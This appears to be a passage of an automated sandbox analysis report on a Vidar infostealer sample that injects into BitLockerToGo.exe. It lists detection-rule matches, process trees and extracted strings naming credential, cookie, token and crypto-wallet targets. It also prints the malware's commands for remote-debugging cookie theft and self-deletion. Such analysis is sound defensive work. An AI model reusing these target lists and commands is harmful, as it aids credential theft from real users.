              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004171E14_2_004171E1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004153AF4_2_004153AF
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 0040D84A appears 136 times
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1966704279.000000000A152000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1974784316.0000000000CC6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameTyping Master 11.exeD" vs SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeBinary or memory string: OriginalFileNameTyping Master 11.exeD" vs SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
              Source: 0.2.SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe.a25c000.1.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 4.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 0.3.SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe.9dda000.3.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 4.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 0.3.SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe.9f00000.2.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 0.2.SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe.a25c000.1.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 0.3.SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe.9f20000.1.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 00000000.00000003.1966662723.000000000A178000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
              Source: 00000004.00000002.2689553328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 00000000.00000002.1977257016.000000000A25C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: wtjw4e.4.drBinary string: #WriteOfflineHivesTerminateSetupModuleds\security\cryptoapi\cryptosetup\cryptosetup.cDCryptoSetup module terminatedCryptoSetupNewRegistryCallBackCryptoSetup EntropyWrite given invalid event typeCryptoSetup EntropyWrite given invalid event data sizeWriteEntropyToNewRegistryCryptoSetup failed to get Ksecdd entropy %08xRNGCryptoSetup failed to open system hive key %08xExternalEntropyCryptoSetup failed to write entropy into the system hive %08xCryptoSetup failed to close system hive key %08xCryptoSetup succeeded writing entropy key\Device\KsecDDWriteCapiMachineGuidCryptoSetup failed get entropy from ksecdd for CAPI machine guid %08x%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02xCryptoSetup failed to convert CAPI machine guid to string %08xMicrosoft\CryptographyCryptoSetup failed get open/create reg key for CAPI machine guid %08xMachineGuidCryptoSetup failed get write CAPI machine guid %08xCryptoSetup assigned CAPI machine guid "%s"
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/33@8/8
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040F029 CreateToolhelp32Snapshot,Process32First,StrCmpCA,Process32Next,StrCmpCA,CloseHandle,4_2_0040F029
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\94GQUNS9.htm
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1002\desktop.ini
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: chrome.exe, 00000005.00000002.2176447902.00006D8C00771000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
              Source: BitLockerToGo.exe, 00000004.00000003.2194159423.00000000059A3000.00000004.00000020.00020000.00000000.sdmp, mozcb1d2n.4.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeReversingLabs: Detection: 39%
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeVirustotal: Detection: 45%
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeString found in binary or memory: net/addrselect.go
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeString found in binary or memory: github.com/saferwall/pe@v1.5.6/loadconfig.go
              Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2288,i,14542950946606832466,4016932128899336426,262144 /prefetch:8
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" & rd /s /q "C:\ProgramData\srq9h" & exit
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe Section loaded: powrprof.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe Section loaded: umpdc.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wininet.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dbghelp.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: sspicli.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: iertutil.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: windows.storage.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wldp.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: profapi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winhttp.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mswsock.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: iphlpapi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winnsi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: urlmon.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: srvcli.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: netutils.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dnsapi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rasadhlp.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: fwpuclnt.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: schannel.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mskeyprotect.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ntasn1.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: msasn1.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dpapi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptsp.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rsaenh.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptbase.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: gpapi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ncrypt.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeStatic file information: File size 6694400 > 1048576
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2df200
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x2be800
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: A{"id":1,"method":"Storage.getCookies"}|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ 
Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2comctl32gdi32:225121Windows 11HTTP/1.1HARDWARE\DESCRIPTION\System\CentralProcessor\0abcdefgh
              Source: Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdbA source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967366423.0000000009F16000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967558818.0000000009E6A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1976184715.0000000009CE2000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1976746685.0000000009E7A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1968679137.0000000009CE0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967984256.0000000009DEC000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1977257016.000000000A25C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1966093639.000000000A252000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2689553328.0000000000400000.00000040.00000400.00020000.00000000.sdmp
              Source: Binary string: vdr1.pdb source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967366423.0000000009F16000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967558818.0000000009E6A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1976184715.0000000009CE2000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1976746685.0000000009E7A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1968679137.0000000009CE0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967984256.0000000009DEC000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1977257016.000000000A25C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1966093639.000000000A252000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000004.00000002.2689553328.0000000000400000.00000040.00000400.00020000.00000000.sdmp
              Source: Binary string: BitLockerToGo.pdb source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1966719770.000000000A142000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cryptosetup.pdbGCTL source: BitLockerToGo.exe, 00000004.00000002.2691298161.000000000599E000.00000004.00000020.00020000.00000000.sdmp, wtjw4e.4.dr
              Source: Binary string: cryptosetup.pdb source: BitLockerToGo.exe, 00000004.00000002.2691298161.000000000599E000.00000004.00000020.00020000.00000000.sdmp, wtjw4e.4.dr
              Source: Binary string: BitLockerToGo.pdbGCTL source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1966719770.000000000A142000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdb source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967366423.0000000009F16000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967558818.0000000009E6A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1976184715.0000000009CE2000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1976746685.0000000009E7A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1968679137.0000000009CE0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967984256.0000000009DEC000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1977257016.000000000A25C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1966093639.000000000A252000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000004.00000002.2689553328.0000000000400000.00000040.00000400.00020000.00000000.sdmp
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040E886 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_0040E886
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeStatic PE information: section name: .symtab
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\srq9h\wtjw4eJump to dropped file
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040E886 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_0040E886
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\ProgramData\srq9h\wtjw4eJump to dropped file
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_4-11554
              Source: C:\Windows\SysWOW64\timeout.exe TID: 8144Thread sleep count: 84 > 30Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00407891 FindFirstFileA,CopyFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,FindNextFileA,FindClose,4_2_00407891
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040A69C FindFirstFileA,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindNextFileA,FindClose,4_2_0040A69C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00408776 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,4_2_00408776
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00413B10 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindNextFileA,FindNextFileA,FindClose,4_2_00413B10
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004013DA FindFirstFileA,FindNextFileA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindNextFileA,FindClose,4_2_004013DA
